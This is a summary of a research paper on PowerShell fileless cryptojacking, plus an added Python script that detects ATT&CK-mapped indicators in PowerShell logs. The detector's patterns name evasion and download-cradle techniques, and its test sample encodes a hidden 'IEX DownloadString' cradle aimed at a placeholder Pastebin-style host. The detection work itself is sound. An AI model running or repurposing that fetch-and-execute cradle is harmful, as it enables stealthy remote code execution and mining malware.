
The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell Scripts

Said Varlioglu, Nelly Elsayed, Eva Ruhsar Varlioglu, Murat Ozer, Zag ElSayed

TL;DR

This paper investigates PowerShell-based fileless cryptojacking, focusing on RAM-resident coinminers that evade disk-based detection. It combines a descriptive analysis of malicious scripts with a new dataset of 200 PowerShell fileless cryptojacking samples, mapped to the MITRE ATT&CK framework to reveal tactic- and technique-level patterns. The study highlights how attackers leverage Log4Shell and other RCE vectors, living-off-the-land techniques, obfuscation, steganography, and C2 channels (including Pastebin) to deploy mining operations and keep them running. Key contributions include a structured MITRE ATT&CK analysis across Initial Access, Execution, Persistence, Defense Evasion, Credential Access, Discovery, Lateral Movement, and Command and Control, as well as a publicly available script corpus for future research and detection development. The findings underscore the practical impact of fileless cryptojacking and point to NLP-based approaches as a promising direction for improved detection and attribution.

Abstract

Fileless malware predominantly relies on PowerShell scripts, leveraging the native capabilities of Windows systems to execute stealthy attacks that leave no traces on the victim's system. The effectiveness of the fileless method lies in its ability to remain operational on victim endpoints through memory execution, even if the attacks are detected and the original malicious scripts are removed. Threat actors have increasingly utilized this technique, particularly since 2017, to conduct cryptojacking attacks. With the emergence of new Remote Code Execution (RCE) vulnerabilities in ubiquitous libraries, widespread cryptocurrency mining attacks have become prevalent, often employing fileless techniques. This paper provides a comprehensive analysis of the PowerShell scripts used in fileless cryptojacking, dissecting the common malicious patterns based on the MITRE ATT&CK framework.
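As an added example (not code from the paper), the following Python triage routine scans a PowerShell command line as it would appear in script-block or process-creation logging, decodes any -EncodedCommand payload, and reports which of the ATT&CK tactics named above each indicator maps to. The rules, the tactic assignments and the sample log line are my own constructions, and the Pastebin-style URL is a placeholder.

```python
"""Heuristic triage of PowerShell command text for the fileless cryptojacking
indicators the paper names, reported per MITRE ATT&CK tactic.
Added example, not code from the paper; the sample log line is constructed."""
import base64
import re

# Each rule: (indicator name, compiled regex, ATT&CK tactic named in the paper).
# Technique IDs are deliberately omitted: only tactic names appear in the summary.
RULES = [
    ("encoded-command flag", re.compile(r"-(?:e|enc|encodedcommand)\b", re.I), "Defense Evasion"),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "Defense Evasion"),
    ("in-memory execution (IEX)", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "Execution"),
    ("remote download", re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I), "Command and Control"),
    ("pastebin C2 channel", re.compile(r"pastebin", re.I), "Command and Control"),
    ("scheduled task / WMI persistence", re.compile(r"schtasks|register-scheduledtask|__eventfilter", re.I), "Persistence"),
    ("mining pool keywords", re.compile(r"stratum\+tcp|xmrig|monero", re.I), "Execution"),
]


def decode_encoded_command(text: str) -> str:
    """Return the UTF-16LE payload behind a -EncodedCommand argument, or "" if none."""
    m = re.search(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", text, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""  # not valid base64/UTF-16LE: treat as no decodable payload


def triage(text: str) -> dict:
    """Run every rule over the raw text plus any decoded payload and return
    {tactic: [indicator, ...]}, i.e. a per-sample ATT&CK tactic mapping."""
    combined = text + "\n" + decode_encoded_command(text)
    hits: dict = {}
    for name, rx, tactic in RULES:
        if rx.search(combined):
            hits.setdefault(tactic, []).append(name)
    return hits


# Constructed sample mimicking the in-memory download cradle the paper describes;
# the URL is a placeholder, not a real C2 address.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.example/raw/PLACEHOLDER')"
SAMPLE_LOG = "powershell.exe -nop -w hidden -enc " + base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

if __name__ == "__main__":
    for tactic, indicators in triage(SAMPLE_LOG).items():
        print(f"{tactic}: {', '.join(indicators)}")
```

Running it against real script-block logs (Event ID 4104) is the natural next step; the dict keyed by tactic is what you would feed into an ATT&CK coverage view.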
